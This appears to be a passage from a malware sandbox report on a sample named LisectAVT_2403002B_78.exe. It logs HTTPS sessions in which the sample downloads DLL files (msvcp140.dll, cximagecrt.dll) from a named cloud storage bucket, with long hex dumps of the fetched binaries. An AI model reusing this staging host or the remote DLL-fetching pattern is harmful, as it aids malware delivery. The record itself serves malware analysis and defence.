                                                                    2024-07-25 09:25:45 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
                                                                    2024-07-25 09:25:45 UTC16384INData Raw: c8 28 00 00 1c 00 00 00 2e 72 64 61 74 61 24 73 78 64 61 74 61 00 00 00 e4 28 00 00 b0 00 00 00 2e 72 64 61 74 61 24 76 6f 6c 74 6d 64 00 00 00 94 29 00 00 3c 02 00 00 2e 72 64 61 74 61 24 7a 7a 7a 64 62 67 00 00 00 d0 2b 00 00 13 ce 00 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 e3 f9 00 00 4d 00 00 00 2e 74 65 78 74 24 78 00 30 fa 00 00 10 03 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 40 fd 00 00 14 09 00 00 2e 65 64 61 74 61 00 00 00 10 01 00 94 00 00 00 2e 64 61 74 61 00 00 00 94 10 01 00 b8 00 00 00 2e 64 61 74 61 24 72 00 4c 11 01 00 b4 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 00 12 01 00 64 04 00 00 2e 62 73 73 00 00 00 00 00 20 01 00 bc 00 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 bc 20 01 00 08 00 00 00 2e 30 30 63 66 67 00 00 c4 20 01 00 78 00 00
                                                                    Data Ascii: (.rdata$sxdata(.rdata$voltmd)<.rdata$zzzdbg+.text$mnM.text$x0.xdata$x@.edata.data.data$rL.data$rsd.bss .idata$5 .00cfg x
                                                                    2024-07-25 09:25:45 UTC16384INData Raw: 57 e8 c2 07 00 00 83 c4 10 50 e8 79 05 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 17 16 00 00 33 ff 39 78 08 74 46 57 ff 15 48 20 01 10 8b f0 e8 02 16 00 00 39 70 08 74 33 81 3b 4d 4f 43 e0 74 2b 81 3b 52 43 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 53 e8 19 84 00 00 83 c4 1c 85 c0 0f 85 c1 00 00 00 8b 45 18 89 45 ec 89 7d f0 39 78 0c 0f 86 b4 00 00 00 ff 75 20 50 ff 75 14 8d 45 ec ff 75 1c 50 8d 45 dc 50 e8 18 83 00 00 8b 55 e0 83 c4 18 8b 45 dc 89 45 f4 89 55 fc 3b 55 e8 0f 83 80 00 00 00 6b ca 14 89 4d f8 8b 00 8d 7d c8 6a 05 8b 70 10 8b 45 1c 03 f1 59 f3 a5 39 45 c8 7f 4e 3b 45 cc 7f 49 8b 4d d4 8b 45 d8 c1 e1 04 83 c0 f0 03 c1 8b 48 04 85 c9 74 06 80 79 08 00 75 2e f6 00 40 75 29 6a 00
                                                                    Data Ascii: WPyU8S];VW39xtFWH 9pt3;MOCt+;RCCt#u$u uuuuSEE}9xu PuEuPEPUEEU;UkM}jpEY9EN;EIMEHtyu.@u)j
                                                                    2024-07-25 09:25:45 UTC8152INData Raw: 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08 8b 58 04 89 4d f4 eb 22 6a 01 8d 4d d0 e8 ad dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 c6 df ff ff 8b 45 e8
                                                                    Data Ascii: "F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQXM"jMMQMQE
                                                                    2024-07-25 09:25:45 UTC16368INData Raw: 56 50 e8 07 dd ff ff 50 ff 75 08 e8 d8 d6 ff ff 83 c4 1c eb 93 6a 01 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 0b 01 00 00 e9 78 ff ff ff 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 ef ff ff e9 dd fe ff ff 8d 45 f0 8d 4d f8 50 39 16 74 10 c7 45 f0 4c 20 00 10 c7 45 f4 09 00 00 00 eb 0e c7 45 f0 58 20 00 10 c7 45 f4 08 00 00 00 e8 59 bf ff ff 8b 0d 00 13 01 10 6a 03 e9 df fe ff ff 83 e8 53 0f 84 9f 00 00 00 83 e8 01 74 4c 48 83 e8 01 74 29 83 e8 03 74 0f 8b 4d 08 6a 02 e8 21 bd ff ff e9 02 ff ff ff ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 08 00 00 e9 66 fe ff ff 8b 55 0c 8d 41 01 a3 00 13 01 10 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 e9 d3 fe ff ff 8d 41 01 a3 00 13 01 10 8b 45 0c 39 10 74 20 50 8d 45 f0 c7 45 f0 64 20 00 10 50 ff 75 08 c7 45 f4 0f 00 00 00 e8 57
                                                                    Data Ascii: VPPujVuAxVuAEMP9tEL EEX EYjStLHt)tMj!uAfUAEJHAE9t PEEd PuEW
                                                                    2024-07-25 09:25:45 UTC16368INData Raw: 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00 00 dc 22 01
                                                                    Data Ascii: o@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !"
                                                                    2024-07-25 09:25:45 UTC8184INData Raw: 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0 c3 82 c7 58
                                                                    Data Ascii: t Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+lX
                                                                    2024-07-25 09:25:45 UTC1532INData Raw: 30 07 06 05 2b 0e 03 02 1a 03 15 00 36 23 47 19 65 db 35 a0 cf c6 7c a2 0d b1 0e 72 24 a3 16 10 a0 81 83 30 81 80 a4 7e 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 02 05 00 e9 55 20 99 30 22 18 0f 32 30 32 34 30 31 32 30 30 30 32 33 35 33 5a 18 0f 32 30 32 34 30 31 32 31 30 30 32 33 35 33 5a 30 74 30 3a 06 0a 2b 06 01 04 01 84 59 0a 04 01 31 2c 30 2a 30 0a 02 05 00 e9 55 20 99 02 01
                                                                    Data Ascii: 0+6#Ge5|r$0~0|10UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100*HU 0"20240120002353Z20240121002353Z0t0:+Y1,0*0U


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.64971643.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:49 UTC135OUTGET /msvcp140.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:49 UTC473INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 446840
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:49 GMT
                                                                    ETag: "c766ca0482dfe588576074b9ed467e38"
                                                                    Last-Modified: Mon, 18 Mar 2024 00:34:14 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 10292142785671919093
                                                                    x-cos-request-id: NjZhMjFhMWRfNDc3MWI3MDlfMWZlMl82MDA4OGY=
                                                                    x-cos-server-side-encryption: AES256
                                                                    2024-07-25 09:25:49 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70
                                                                    Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 00 00 00 16 40 1c 70 00 10 b0 74 02 10 80 c6 00 10 80 be 00 10 f0 90 02 10 80 a2 02 10 d0 9d 02 10 70 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 f0 2e 02 10 30 91 02 10 80 c7 00 10 c8 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 00 92 02 10 50 91 02 10 1c 71 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 10 9e 02 10 50 9f 02 10 18 73 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 70 71 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 10 72 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00
                                                                    Data Ascii: @ptpp .0p Pq Pst,P=6,`=/.pqt,P=6,`=/.rt,P=6,`=
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 10 38 6a 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 b8 3e 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 3f 06 10 68 6a 00 10 00 00 00 00 01 00 00 00 06 00 00 00 78 6a 00 10 94 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 10 3f 06 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 68 6a 00 10 38 3f 06 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6a 00 10 00 00 00 00 01 00 00 00 05 00 00 00 dc 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 3f 06 10 08 6b 00 10 00 00 00 00 01 00 00 00 06 00 00 00 18 6b 00 10 34 6b 00 10 b0 6a 00 10 e8 67
                                                                    Data Ascii: 8j(]\D]>@j?hjxjjjg(]\D]?@hj8?@jjjg(]\D]X?kk4kjg
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7
                                                                    Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49
                                                                    Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 00 e4 ff ff 68 48 09 04 10 8d 45 f4 50 e8 bb ff 02 00 cc cc cc cc cc cc cc 56 8b f1 8b 46 10 85 c0 7e 0b ff 76 0c ff 15 cc 61 06 10 eb 0a 79 09 ff 76 0c e8 69 f3 02 00 59 ff 76 14 ff 15 cc 61 06 10 59 5e c3 cc cc cc cc 55 8b ec 6a ff 68 a4 cf 03 10 64 a1 00 00 00 00 50 56 57 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 6a 00 e8 b3 f3 ff ff 8b 47 28 85 c0 74 12 8b 30 6a 10 50 e8 7c ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 28 00 8b 47 2c 85 c0 74 12 8b 30 6a 0c 50 e8 5f ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 2c 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e c9 c3 cc cc cc cc cc 56 8b f1 8b 46 14 83 f8 0f 76 0b 40 50 ff 36 e8 1e d6 ff ff 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 cc cc cc cc cc cc cc cc cc
                                                                    Data Ascii: UMhHEPVF~vayviYvaY^UjhdPVW23PEdjG(t0jP|YYug(G,t0jP_YYug,MdY_^VFv@P6YYfF^
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 56 57 ff 75 0c 8b f9 ff 75 08 8b 07 8b 70 24 8b ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50
                                                                    Data Ascii: VWuup$0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEP
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03
                                                                    Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
                                                                    2024-07-25 09:25:49 UTC8184INData Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b
                                                                    Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.64972043.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:51 UTC137OUTGET /cximagecrt.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:52 UTC473INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 1597304
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:51 GMT
                                                                    ETag: "66df6f7b7a98ff750aade522c22d239a"
                                                                    Last-Modified: Mon, 18 Mar 2024 09:04:14 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 8479649161396391637
                                                                    x-cos-request-id: NjZhMjFhMWZfNDhhZjRkMGJfZDZjZV81ZTY0OWQ=
                                                                    x-cos-server-side-encryption: AES256
                                                                    2024-07-25 09:25:52 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ac 20 ff 79 e8 41 91 2a e8 41 91 2a e8 41 91 2a 76 e1 56 2a ee 41 91 2a e5 13 4c 2a ec 41 91 2a e5 13 4e 2a e2 41 91 2a e5 13 71 2a e5 41 91 2a e5 13 70 2a ec 41 91 2a 5d df 75 2a 38 41 91 2a e1 39 02 2a e1 41 91 2a e8 41 90 2a 2a 41 91 2a 5d df 70 2a c8 41 91 2a 5d df 4d 2a e9 41 91 2a e5 13 4a 2a e9 41 91 2a e8 41 06 2a e9 41 91 2a 5d df 4f 2a e9 41 91 2a 52 69 63 68 e8 41 91
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ yA*A*A*vV*A*L*A*N*A*q*A*p*A*]u*8A*9*A*A**A*]p*A*]M*A*J*A*A*A*]O*A*RichA
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 8d d4 7f ff ff 8b 3b 89 b5 f0 7f ff ff c7 85 c8 7f ff ff 00 00 00 00 8d 04 8d 00 00 00 00 03 f8 83 bd e0 7f ff ff 00 0f 8e 91 00 00 00 83 7b 08 00 8b 4b 04 8b 17 74 24 49 be 01 00 00 00 d3 e6 8b c6 f7 d8 3b d0 0f 8c 9e 02 00 00 3b d6 0f 8d 96 02 00 00 8b b5 f0 7f ff ff eb 17 85 d2 0f 88 86 02 00 00 b8 01 00 00 00 d3 e0 3b d0 0f 8d 77 02 00 00 2b 95 e4 7f ff ff 83 c7 04 8b 8d e8 7f ff ff 66 0f 6e c2 f3 0f e6 c0 f2 0f 5e c1 f2 0f 11 06 8b 01 8d 34 c6 8b 85 c8 7f ff ff 40 89 b5 f0 7f ff ff 89 85 c8 7f ff ff 3b 85 e0 7f ff ff 0f 8c 77 ff ff ff 8b 95 dc 7f ff ff eb 06 8b 8d e8 7f ff ff 8b 85 d8 7f ff ff 42 8b b5 ec 7f ff ff 83 c0 14 83 c6 08 89 95 dc 7f ff ff 89 85 d8 7f ff ff 89 b5 ec 